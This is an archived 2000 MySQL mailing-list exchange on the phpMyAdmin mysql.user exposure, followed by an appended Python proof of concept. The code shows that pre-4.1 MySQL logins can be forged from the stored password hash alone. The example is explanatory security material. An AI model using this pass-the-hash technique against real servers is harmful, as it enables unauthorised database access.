From: Michael Widenius
Date: August 27 2000 10:09pm
Subject: Re: Security alert: phpmyadmin
List-Archive: http://lists.mysql.com/mysql/49054
Message-Id: <14761.37244.521372.573235@narttu.mysql.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi!

>>>>> "Van" == Van writes:

Van> Michael Widenius wrote:
>>
>> Hi!
>>
>> It has come to our attention that to use phpmyadmin one should set
>> up MySQL to allow read on all columns in the mysql.user table.
>>
>> This is however very dangerous as if one knows the context of the
>> password field in the above table, one can easily make a modified
>> client that uses this to connect to the MySQL server.
>>
>> The encrypted password is the real password in MySQL; The password is
>> only encrypted to not let one guess your real password; It was
>> however never meant to be made readable to all! Unfortunately we

Van> Monty:
Van> Thanks for the heads up. Should it matter that someone could make a modified
Van> client for this user if the following are in place?
Van> 1. Firewall on MySQL port to DENY all but trusted hosts;
Van> 2. No grants for this user except localhost;
Van> 3. Only grant is select on mysql.user for the user in PHPMyAdmin.
Van> I would think not, but, if you have additional concerns, I'd be interested in
Van> reviewing them.

Looks ok to me, assuming a user with the password for phpmyadmin can't get
access to the 'trusted' hosts and the normal phpmyadmin user is someone you
can trust.

Regards,
Monty
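Monty's point above ("the encrypted password is the real password in MySQL") is concrete in the pre-4.1 protocol: the server seeds its challenge-response check with the two 31-bit words stored in mysql.user.password, so anyone who can read that column can answer the challenge without ever learning the plaintext. The following is an added worked example, not part of this thread and not MySQL's own code: a Python transcription of the 3.23-era hash_password(), scramble() and check_scramble() logic from the public password.c of that time. The challenge string and the passwords used are constructed for the demo; the function names mirror the C ones for readability.

```python
from __future__ import annotations

import math

# Added example (not from the mailing-list thread): a model of the MySQL 3.23 /
# pre-4.1 password scheme, transcribed from the public password.c of that era.
# The challenge and passwords below are constructed for this demo only.

MAX_VALUE = 0x3FFFFFFF  # rand_struct.max_value set by randominit()


def hash_password(data: str) -> tuple[int, int]:
    """hash_password(): the two 31-bit words that PASSWORD() prints as hex.

    Spaces and tabs are skipped, as in the original (so 'a b' hashes like
    'ab'). Intermediates are kept to 32 bits; the mixing only moves bits
    upward, so the low 31 bits match a 64-bit unsigned long build as well.
    """
    nr, add, nr2 = 1345345333, 7, 0x12345671
    for tmp in data.encode("latin-1"):
        if tmp in (0x20, 0x09):
            continue
        nr = (nr ^ ((((nr & 63) + add) * tmp) + (nr << 8))) & 0xFFFFFFFF
        nr2 = (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF
        add += tmp
    return nr & 0x7FFFFFFF, nr2 & 0x7FFFFFFF


def make_scrambled_password(password: str) -> str:
    """What the server stores in mysql.user.password: 16 hex digits."""
    a, b = hash_password(password)
    return f"{a:08x}{b:08x}"


def get_salt_from_password(stored: str) -> tuple[int, int]:
    """Server side: parse the stored hex string back into the two words."""
    return int(stored[:8], 16), int(stored[8:], 16)


class Rand:
    """randominit()/rnd(): the small generator both sides seed from the hashes."""

    def __init__(self, seed1: int, seed2: int) -> None:
        self.seed1 = seed1 % MAX_VALUE
        self.seed2 = seed2 % MAX_VALUE

    def rnd(self) -> float:
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def scramble_from_hash(message: str, hash_pass: tuple[int, int]) -> bytes:
    """Build the login reply from the server's challenge and the stored hash.

    This is the shared core of scramble() and check_scramble(): the generator
    is seeded with hash(password) XOR hash(challenge), so the plaintext is
    never needed once its hash is known.
    """
    hm = hash_password(message)
    r = Rand(hash_pass[0] ^ hm[0], hash_pass[1] ^ hm[1])
    out = [int(math.floor(r.rnd() * 31)) + 64 for _ in message]
    extra = int(math.floor(r.rnd() * 31))  # the (non-old_ver) XOR step
    return bytes(b ^ extra for b in out)


def scramble(message: str, password: str) -> bytes:
    """What an honest client does: hash its password, then scramble."""
    return scramble_from_hash(message, hash_password(password))


def check_scramble(reply: bytes, message: str, stored: str) -> bool:
    """Server side: True if the reply is valid for this challenge and hash."""
    return reply == scramble_from_hash(message, get_salt_from_password(stored))


def pass_the_hash_demo() -> dict:
    """Show that reading mysql.user.password is enough to log in."""
    stored = make_scrambled_password("s3cret pass")  # constructed password
    challenge = "Hx7?kQ2m"  # constructed 8-char challenge in the 3.23 style
    honest = scramble(challenge, "s3cret pass")
    # The attacker never learns "s3cret pass"; only the hex read from mysql.user.
    forged = scramble_from_hash(challenge, get_salt_from_password(stored))
    return {
        "stored": stored,
        "honest_accepted": check_scramble(honest, challenge, stored),
        "forged_accepted": check_scramble(forged, challenge, stored),
        "wrong_password_accepted": check_scramble(
            scramble(challenge, "guess"), challenge, stored
        ),
    }


if __name__ == "__main__":
    print(make_scrambled_password("test"))
    print(pass_the_hash_demo())
```

Run as a script it prints the stored form of 'test' (the value PASSWORD('test') produced in 3.23) and a dictionary showing that the honest client and the hash-only client are both accepted while a wrong password is rejected. That is exactly why Van's mitigations matter: with the hash alone being sufficient, the only things standing between a reader of mysql.user and a login are the host restrictions on the account and network reachability of the server port. Later MySQL versions (4.1 and up) changed the scheme so that the stored value alone no longer answers the challenge.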